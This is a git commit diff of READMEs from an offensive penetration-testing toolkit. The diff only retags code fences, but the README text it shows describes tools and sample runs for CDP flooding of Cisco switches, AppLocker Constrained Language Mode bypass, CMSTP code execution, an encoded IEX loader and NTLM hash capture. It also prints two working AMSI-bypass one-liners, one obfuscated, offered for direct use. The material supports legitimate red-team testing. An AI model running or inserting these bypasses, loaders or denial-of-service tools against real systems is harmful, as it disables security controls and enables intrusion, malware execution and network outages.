mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-11-21 18:11:37 +01:00
readmes changed
This commit is contained in:
parent
ccf52e3dba
commit
dfaf2ad518
@ -2,7 +2,7 @@
|
|||||||
|
|
||||||
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
|
- **`tamperUpx.py`** - A small utility that corrupts UPX-packed executables, making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
||||||
|
|
||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
|
- **`CDPFlooder.py`** - CDP Flooding tool, intended to take out entire segment switched by some old Cisco switches, vulnerable to Denial of Service after receiving big amount of invalid CDP packets.
|
||||||
|
|
||||||
The effect will be similar to:
|
The effect will be similar to:
|
||||||
```
|
```shell
|
||||||
SW2960#show cdp traffic
|
SW2960#show cdp traffic
|
||||||
CDP counters :
|
CDP counters :
|
||||||
Total packets output: 361, Input: 11824
|
Total packets output: 361, Input: 11824
|
||||||
@ -28,7 +28,7 @@ victim's premises or to aid Password-Spraying efforts against exposed OWA
|
|||||||
interface.
|
interface.
|
||||||
|
|
||||||
Sample run:
|
Sample run:
|
||||||
```
|
```powershell
|
||||||
PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
||||||
|
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
@ -136,7 +136,7 @@ TODO:
|
|||||||
- Implement sniffer hunting for used protocols and their auth strings
|
- Implement sniffer hunting for used protocols and their auth strings
|
||||||
- Implement semi-auto mode that is first learning a network, then choosing specific attacks
|
- Implement semi-auto mode that is first learning a network, then choosing specific attacks
|
||||||
|
|
||||||
```
|
```bash
|
||||||
bash $ python RoutingAttackKit.py
|
bash $ python RoutingAttackKit.py
|
||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
@ -236,7 +236,7 @@ Capturing on 'eth0'
|
|||||||
|
|
||||||
Sample output:
|
Sample output:
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./VLANHopperDTP.py --help
|
$ ./VLANHopperDTP.py --help
|
||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
|
@ -26,7 +26,7 @@ Takes two files on input. Tries to find every line of the second file within the
|
|||||||
|
|
||||||
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
- **`vm-manager.sh`** - A bash script offering several aliases/functions for quick management of a single Virtualbox VM machine. Handy to use it for example to manage a Kali box. By issuing `startkali` the VM will raise, `sshkali` - offers instant SSH into your VM, `getkali` - returns VM's IP address, `iskali` - checks whether VM is running, `stopkali` goes without explanation. [gist](https://gist.github.com/mgeeky/80b1f7addb792796d8bfb67188d72f4a)
|
||||||
|
|
||||||
```
|
```bash
|
||||||
user@my-box $ startkali
|
user@my-box $ startkali
|
||||||
[>] Launching kali in headless
|
[>] Launching kali in headless
|
||||||
[>] Awaiting for machine to get up...
|
[>] Awaiting for machine to get up...
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
|
- **`Bypass-ConstrainedLanguageMode`** - Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ )
|
||||||
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
|
The way it does so is by registering a custom COM object (`InProcServer32` DLL) that will act as a native *.NET CLR4* host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switch `SessionData.LanguageMode` variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS > $ExecutionContext.SessionState.LanguageMode
|
PS > $ExecutionContext.SessionState.LanguageMode
|
||||||
ConstrainedLanguage
|
ConstrainedLanguage
|
||||||
PS > .\Bypass-CLM.ps1
|
PS > .\Bypass-CLM.ps1
|
||||||
@ -48,7 +48,7 @@ FullLanguage
|
|||||||
|
|
||||||
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
|
- **`cmstp-template.inf`** - INF file being a smallest possible template for **CMSTP** code execution technique, as described by [LOLBAS project](https://lolbas-project.github.io/lolbas/Binaries/Cmstp/). Sample usage:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
cmstp.exe /ni /s cmstp.inf
|
cmstp.exe /ni /s cmstp.inf
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -63,7 +63,7 @@ cmstp.exe /ni /s cmstp.inf
|
|||||||
|
|
||||||
Example:
|
Example:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
|
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
|
||||||
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
|
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
|
||||||
```
|
```
|
||||||
@ -78,7 +78,7 @@ IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Com
|
|||||||
|
|
||||||
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
|
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS > "amsiInitFailed"
|
PS > "amsiInitFailed"
|
||||||
At line:1 char:1
|
At line:1 char:1
|
||||||
+ "amsiInitFailed"
|
+ "amsiInitFailed"
|
||||||
@ -97,12 +97,12 @@ amsiInitFailed
|
|||||||
|
|
||||||
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
|
- OH, by the way - you can grab **my custom AMSI evasion oneliners** below - perfect for a one-shot use cases:
|
||||||
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
* **Technique 1A**: Overwrite `AmsiUtils.amsiContext`'s object (`_HAMSICONTEXT.Signature`) byte. Length: 146 bytes.
|
||||||
```
|
```powershell
|
||||||
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
||||||
```
|
```
|
||||||
|
|
||||||
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
|
* **Technique 1B**: Same as 1A, but obfuscated variant. (256 bytes)
|
||||||
```
|
```powershell
|
||||||
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
|
||||||
```
|
```
|
||||||
|
|
||||||
@ -125,7 +125,7 @@ amsiInitFailed
|
|||||||
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
|
- `Import-ReconData -DirName <DIR>` - Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.
|
||||||
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
|
- `Get-ReconData -DirName <DIR>` - Gets names of variables that were created and contains previously imported data.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
|
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
|
||||||
Loaded $FileFinderSearchSYSVol results.
|
Loaded $FileFinderSearchSYSVol results.
|
||||||
Loaded $FileFinder results.
|
Loaded $FileFinder results.
|
||||||
@ -176,7 +176,7 @@ This script can embed following data within constructed CSharp Task:
|
|||||||
|
|
||||||
Example output **not minimized**:
|
Example output **not minimized**:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
@ -233,7 +233,7 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox
|
|||||||
|
|
||||||
**minimized**
|
**minimized**
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
|
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
|
||||||
|
|
||||||
:: Powershell via MSBuild inline-task XML payload generation script
|
:: Powershell via MSBuild inline-task XML payload generation script
|
||||||
@ -251,13 +251,13 @@ C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
|
|||||||
|
|
||||||
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
|
This scriptlet works with both older version of PowerView that got implemented `Get-NetOU` cmdlet, by passing its output via pipeline to `Get-NetOUTree`:
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
|
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
|
||||||
```
|
```
|
||||||
|
|
||||||
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
|
or with new version of PowerView coming with it's `Get-DomainOU` cmdlet.
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
||||||
+ CONTOSO
|
+ CONTOSO
|
||||||
+ SharedFolders
|
+ SharedFolders
|
||||||
@ -296,7 +296,7 @@ PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
|
|||||||
|
|
||||||
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
|
- **`markOwnedNodesInNeo4j.py`** - This script takes an input file containing Node names to be marked in Neo4j database as owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted a number of accounts, access set of workstations or even cracked userPassword hashes. Using this script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your future use of BloodHound.
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
$ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
||||||
[.] Connected to neo4j instance.
|
[.] Connected to neo4j instance.
|
||||||
[.] Marking nodes (0..10) ...
|
[.] Marking nodes (0..10) ...
|
||||||
@ -342,7 +342,7 @@ $ ./markOwnedNodesInNeo4j.py kerberoasted.txt
|
|||||||
|
|
||||||
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
|
- [**`SharpWebServer`**](https://github.com/mgeeky/SharpWebServer) - Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
|
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
|
||||||
|
|
||||||
:: SharpWebServer ::
|
:: SharpWebServer ::
|
||||||
@ -377,7 +377,7 @@ SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
|
|||||||
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
|
* The resulting binary may be considered bit too large, that's because `Costura.Fody` NuGet package is used which bundles `System.Management.Automation.dll` within resulting assembly
|
||||||
|
|
||||||
|
|
||||||
```
|
```powershell
|
||||||
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
|
||||||
|
|
||||||
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
|
||||||
|
@ -31,7 +31,7 @@
|
|||||||
|
|
||||||
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
|
- **`padding-oracle-tests.py`** - Padding Oracle test-cases generator utility aiding process of manual inspection of cryptosystem's responses. ([gist](https://gist.github.com/mgeeky/5dfa475af2c970197a62ad070ba5deee))
|
||||||
|
|
||||||
```
|
```python
|
||||||
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
|
||||||
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
|
# of a target cryptosystem, by generating set of test cases to fed the cryptosystem with.
|
||||||
#
|
#
|
||||||
@ -84,7 +84,7 @@ Using sample: "4a5451344a5459314a545a6a4a545a6a4a545a6d4a5449774a5463334a545a6d4
|
|||||||
|
|
||||||
When `DEBUG` is turned on, the output may also look like:
|
When `DEBUG` is turned on, the output may also look like:
|
||||||
|
|
||||||
```
|
```bash
|
||||||
$ ./reencode.py JTQxJTQxJTQxJTQx
|
$ ./reencode.py JTQxJTQxJTQxJTQx
|
||||||
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
[.] Trying: URLEncoder (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
||||||
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
[.] Trying: HexEncoded (peeled off: 0). Current form: "JTQxJTQxJTQxJTQx"
|
||||||
|
@ -41,7 +41,8 @@ I've experienced following:
|
|||||||
Use `--verbose` for additional _field steps explanation_ output.
|
Use `--verbose` for additional _field steps explanation_ output.
|
||||||
|
|
||||||
Sample usage:
|
Sample usage:
|
||||||
```
|
|
||||||
|
```powershell
|
||||||
PS> python3 rdpFileUpload.py -v -f certutil README.md
|
PS> python3 rdpFileUpload.py -v -f certutil README.md
|
||||||
|
|
||||||
:: RDP file upload utility via Keyboard emulation.
|
:: RDP file upload utility via Keyboard emulation.
|
||||||
|
Loading…
Reference in New Issue
Block a user